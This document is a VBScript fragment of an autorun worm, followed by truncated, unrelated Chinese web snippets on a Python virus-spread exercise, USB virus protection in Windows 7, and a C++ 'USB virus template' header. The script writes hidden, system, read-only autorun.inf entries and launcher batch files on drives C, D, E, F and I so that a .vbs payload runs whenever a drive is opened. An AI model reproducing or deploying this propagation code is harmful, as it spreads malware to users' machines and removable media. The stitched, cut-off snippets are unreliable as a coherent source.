if fso.fileexists("c:/autorun.inf") then
set objfolder = fso.getfile("c:/autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>c:/autorun.inf"_
&"&& echo open=******x.bat >>c:/autorun.inf"_
&"&& echo shellexecute=******xx.bat >>c:/autorun.inf"_
&"&& echo shell/auto/command=******x.bat>>c:/autorun.inf"_
&"&& echo shell=auto>>c:/autorun.inf"_
&"&& attrib +h +s +r c:/autorun.inf"
set autobatc=fso.createtextfile("c:/******.bat",1,ture)
autobatc.writeline("******.vbs")
end if
if fso.fileexists("d:/autorun.inf") then
set objfolder = fso.getfile("d:/autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>d:/autorun.inf"_
&"&& echo open=******x.bat >>d:/autorun.inf"_
&"&& echo shellexecute=******.bat >>d:/autorun.inf"_
&"&& echo shell/auto/command=******.bat>>d:/autorun.inf"_
&"&& echo shell=auto>>d:/autorun.inf"_
&"&& attrib +h +s +r d:/autorun.inf"
set autobatd=fso.createtextfile("d:/***xx.bat",1,ture)
autobatd.writeline("***x.vbs")
end if
if fso.fileexists("e:/autorun.inf") then
set objfolder = fso.getfile("e:/autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>e:/autorun.inf"_
&"&& echo open=***xx.bat >>e:/autorun.inf"_
&"&& echo shellexecute=***xx.bat >>e:/autorun.inf"_
&"&& echo shell/auto/command=***xx.bat>>e:/autorun.inf"_
&"&& echo shell=auto>>e:/autorun.inf"_
&"&& attrib +h +s +r e:/autorun.inf"
set autobate=fso.createtextfile("e:/***xx.bat",1,ture)
autobate.writeline("******.vbs")
end if
if fso.fileexists("f:/autorun.inf") then
set objfolder = fso.getfile("f:/autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>f:/autorun.inf"_
&"&& echo open=n***x.bat >>f:/autorun.inf"_
&"&& echo shellexecute=******.bat >>f:/autorun.inf"_
&"&& echo shell/auto/command=***xx.bat>>f:/autorun.inf"_
&"&& echo shell=auto>>f:/autorun.inf"_
&"&& attrib +h +s +r f:/autorun.inf"
set autobatf=fso.createtextfile("f:/***xx",1,ture)
autobatf.writeline("******.vbs")
end if
if fso.fileexists("i:/autorun.inf") then
set objfolder = fso.getfile("i:/autorun.inf")
else
wsh.run "cmd /c echo [autorun]>>i:/autorun.inf"_
&"&& echo open=***xx.bat >>i:/autorun.inf"_
&"&& echo shellexecute=***xx.bat >>i:/autorun.inf"_
&"&& echo shell/auto/command=******.bat>>i:/autorun.inf"_
&"&& echo shell=auto>>i:/autorun.inf"_
&"&& attrib +h +s +r i:/autorun.inf"
set autobatf=fso.createtextfile("i:/***xx.bat",1,ture)
autobatf.writeline("******x.vbs")
end if
python演算法 病毒傳播模型
這題比較簡單,只要找出每次傳播中各資料變化的規律,一層一層地算即可 get到重點 def virus set day row 0 傳播次數 day 0 天數 num 1 感染人數 while day set day row 1 day row 5 5天傳播一次 num 2if day set day...
在Win7中如何防範U盤病毒的傳播?
軟盤已經成為塵封的歷史,現如沒使用過 u 盤的計算機使用者恐怕真的鳳毛麟角了。u 盤以其日漸小巧的體積,快速擴張的容量,越來越便宜的 成功的替代了軟盤,成為主流的移動儲存介質。方便的同時帶來的是巨大的安全隱患。u 盤已經成為除了網路之外傳播數量最大的病毒和惡意程式傳播途徑。在不經意的一插之間,病毒或...
VC U盤病毒模版
當然不是我寫的,但會仿寫 include stdafx.h include include include include include include pragma comment lib,ws2 32 void initdata void virusfunc bool checkdisk vo...